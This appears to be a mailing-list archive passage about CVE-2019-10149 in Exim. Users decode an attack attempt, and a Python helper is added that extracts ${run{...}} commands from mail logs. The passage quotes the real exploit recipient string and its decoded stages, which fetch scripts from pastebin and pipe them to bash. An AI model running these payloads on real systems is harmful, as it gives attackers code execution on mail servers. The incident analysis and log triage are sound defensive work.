> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost

$ perl -e 'print
"\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22\n";'
/bin/sh -c  "curl https://pastebin.com/raw/Dj3JTtnj -o /tmp/baby"

then:

$ wget --quiet -O - https://pastebin.com/raw/Dj3JTtnj && echo

nohup bash -c '(curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q
-O- hhttps://pastebin.com/raw/EzqVke6X)|bash' >/dev/null 2>&1 &
rm -rf /tmp/baby*

$ wget --quiet -O -  https://pastebin.com/raw/EzqVke6X && echo
(curl -fsSL https://pastebin.com/raw/yVAeeKTB||wget -q -O -
https://pastebin.com/raw/yVAeeKTB)| base64 -d |bash

Which yields the content I've pasted at:

https://pastebin.com/Gzi4cvc8

Regards

D.


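Drav's perl one-liner decodes one payload by hand. The Python below is an added example for this page, not code from the thread or from Exim, that does the same over log text: it finds every `${run{...}}` in `exim -Mvl` or mainlog lines and undoes the escapes Exim's string expander accepts in the subset these payloads use (`\xhh`, octal `\ddd`, `\t`/`\n`/`\r`, `\\`). The log lines are constructed to the same shape as the ones posted in the thread, with the attacker's download URL replaced by example.invalid; the escape set is my reading of Exim's expansion rules rather than something the thread states.

```python
import re

# Escapes the Exim string expander turns into characters; attack payloads use
# the \xhh form so the command can ride inside an RFC-valid-looking local part.
_ESCAPE = re.compile(
    r"\\x([0-9A-Fa-f]{1,2})"   # \x2f  -> "/"
    r"|\\([0-7]{1,3})"         # \044  -> "$"
    r"|\\(.)"                  # \t \n \r \\ and e.g. "\z" -> "z"
)
_RUN_ITEM = re.compile(r"\$\{run\{(.*?)\}\}")
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t"}


def exim_unescape(s: str) -> str:
    """Undo \\xhh, \\ddd and single-character escapes, expansion style."""
    def one(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SIMPLE.get(m.group(3), m.group(3))
    return _ESCAPE.sub(one, s)


def extract_run_commands(log_text: str) -> list:
    """Return the decoded command of every ${run{...}} found in `log_text`,
    in order of appearance.  Works on `exim -Mvl` output and on mainlog
    lines alike, since both carry the raw local part."""
    commands = []
    for line in log_text.splitlines():
        for m in _RUN_ITEM.finditer(line):
            commands.append(exim_unescape(m.group(1)))
    return commands


# Constructed sample: same shape as the frozen-message log posted in the
# thread, with the real download URL replaced by example.invalid.
SAMPLE_LOG = r"""2019-06-20 15:13:33 Received from <> H=(example.invalid) [192.0.2.10] P=smtp S=1114
2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2dO\x20\x2ftmp\x2fx\x20https\x3a\x2f\x2fexample\x2einvalid\x2fx\x22}}@example.invalid: Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-21 09:00:00 routing failed for ${run{\x2Fbin\x2Fsh\t-c\t\x22id\x22}}@localhost: Too many "Received" headers - suspected mail loop
"""


if __name__ == "__main__":
    for cmd in extract_run_commands(SAMPLE_LOG):
        print(repr(cmd))
```

Feed it the whole mainlog rather than only frozen messages: a patched 4.92 logs the identical "routing failed" line for an attempt that did nothing, so the decoded commands tell you what was tried, and the ctime check earlier in the thread tells you whether it worked.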


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Benoît PELISSIER via Exim-users

My version is updated so they cant, but they tried ?

Benoît

On 21/06/2019 at 15:20, Jeremy Harris via Exim-users wrote:
> On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote:
>> My mail system has been hacked ?
>
> At the very least an attempt to do so
>
>> CVE-2019-10149 ?
>
> Yes



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Jeremy Harris via Exim-users
On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote:
> My mail system has been hacked ?

At the very least an attempt to do so

> CVE-2019-10149 ?

Yes

-- 
Cheers,
  Jeremy
